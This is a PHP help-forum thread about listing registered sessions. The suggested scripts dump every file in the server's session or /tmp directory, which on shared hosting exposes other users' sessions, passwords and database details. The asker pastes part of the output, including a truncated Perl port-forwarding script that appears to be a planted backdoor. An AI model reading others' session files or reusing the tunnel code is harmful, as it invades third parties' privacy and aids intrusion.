• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 266
  • Last Modified:

Creating a list of all registered sessions

Last night my 11 years old son asked me if it's possible to create
a list of all registered sessions while I was reading a PHP
tutorial. I tried a "For each" loop, but had to give up
after receiving some errors.

I appreciate if somebody can show him (if possible) how to
create a list of all registered session.
  • 5
  • 3
  • 2
  • +1
1 Solution
try this

foreach ($_SESSION as $x)
echo $x;
Richard QuadlingSenior Software DeveloperCommented:
Dr_dedo, not just the variables for the current session, but all sessions.


PHP 5 code (required because I am using the SPL DirectoryIterator class).

foreach(new DirectoryIterator(session_save_path()) as $obj_Session)
      if ($obj_Session->isFile())
            $s_session_data = file_get_contents($obj_Session->getPathname());
            echo '<b>' . $obj_Session->getPathname() . '</b><br /><pre>' . var_export($s_session_data, True) . '</pre><br /><br />';

Works for me!
Richard QuadlingSenior Software DeveloperCommented:
You will probably have problems if the sessions are locked against a site (in a multiple hosted server), so only sessions on your own site.

I've just ran this on a friends server and the number of perl backdoor scripts present was frightening!
Free Tool: Subnet Calculator

The subnet calculator helps you design networks by taking an IP address and network mask and returning information such as network, broadcast address, and host range.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

wow, niceeeeeeeeeee
Richard QuadlingSenior Software DeveloperCommented:
If you site is using the /tmp directory for the session files, then you will get a LOT of junk here too. So watch out when you run that script.
MnInShdwAuthor Commented:
thanks dr_dedo  for your help.
I had forgotten to start the session in my script
and that was why it didn't work out.

And million thanks to RQuadling for trying to help
but unfotunately ixwebhosting is still on php4 and
I received "Unknown function" when I tried to
test the sample code.

One more time thanks to all who helped.
Richard QuadlingSenior Software DeveloperCommented:
The answer provided by dr_dedo has nothing to do with listing all the registered sessions!!!

It only allows you to look at your OWN current session.

And if you said you where on PHP4, I'd have given an appropriate answer.

You also did not say what your errors were.

This is an equivalent PHP4 script.

$obj_Dir = dir(session_save_path());
while(False !== ($s_file = $obj_Dir->read()))
      echo $s_file;
      if (!in_array($s_file, array('.', '..')))
            $s_session_data = file_get_contents(session_save_path() . "/$s_file");
            echo '<b>' . $s_file . '</b><br /><pre>' . var_export($s_session_data, True) . '</pre><br /><br />';

This will also work with PHP5, but the process is a lot easier in PHP5 with the SPL.

Tell you 11 year old to keep into programming, its a lot of fun =)
MnInShdwAuthor Commented:
Hi RQuadling

First of all my appologies for not mentioning the errors contents.

I did a copy and paste of your code and heaven.... I had a lot of things
in the result. the page contents was over several thousands lines
A lot of subs - functions - even other homepages were inserted in the result
but nothing about the session variables.
the frist line starts with several errors:
Warning: file_get_contents(/tmp/lost+found): failed to open stream: Permission denied in /hsphere/local/home/mydomain/mydomain.com/test2.php on line 8

I have even a lot of subs and functions
use IO::Socket;
use POSIX;
$localport = $ARGV[0];
$host      = $ARGV[1];
$port      = $ARGV[2];
$DIR = undef;
$| = 1;
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
%o = (\'port\' => $localport,\'toport\' => $port,\'tohost\' => $host);
$ah = IO::Socket::INET->new(\'LocalPort\' => $localport,\'Reuse\' => 1,\'Listen\' => 10) || die "$!";
$SIG{\'CHLD\'} = \'IGNORE\';
$num = 0;
while (1) {
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\\n"; next; }
$pid = fork();
if (!defined($pid)) { print STDERR "$!\\n"; }
elsif ($pid == 0) { $ah->close(); Run(\\%o, $ch, $num); }
else { $ch->close(); }
sub Run {
my($o, $ch, $num) = @_;
my $th = IO::Socket::INET->new(\'PeerAddr\' => $o->{\'tohost\'},\'PeerPort\' => $o->{\'toport\'});
if (!$th) { exit 0; }
my $fh;
if ($o->{\'dir\'}) { $fh = Symbol::gensym(); open($fh, ">$o->{\'dir\'}/tunnel$num.log") or die "$!"; }
while ($ch || $th) {
my $rin = "";
vec($rin, fileno($ch), 1) = 1 if $ch;
vec($rin, fileno($th), 1) = 1 if $th;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout  &&  !$eout) {}
my $cbuffer = "";
my $tbuffer = "";
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
my $result = sysread($ch, $tbuffer, 1024);
if (!defined($result)) {
print STDERR "$!\\n";
exit 0;

and there's a lot of passwords and database informations (obviously not mine)
the page never ends and the contents are adding, I had to hit stop and then Ctrl+Break.
I have even more than 20 other home pages embedded in the result.
this is one of them and is in the middle of the result

None of my registered session was in the result.
To me it doesn't appear to be the correct method of gathering the
registered session.

I appreciate your trying to help.
Million thanks
MnInShdwAuthor Commented:
Hi BogoJoker
I told my son about your message, but his dad has a hard
time learning PHP at the age of 43.

Thank you for your input
Richard QuadlingSenior Software DeveloperCommented:
The session directory is quite often the /tmp folder on the server.

What you are seeing is ALL the content of the temp folder.

On my servers the session folder is NOT tmp. So I only see other people's sessions.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Cloud Class® Course: Python 3 Fundamentals

This course will teach participants about installing and configuring Python, syntax, importing, statements, types, strings, booleans, files, lists, tuples, comprehensions, functions, and classes.

  • 5
  • 3
  • 2
  • +1
Tackle projects and never again get stuck behind a technical roadblock.
Join Now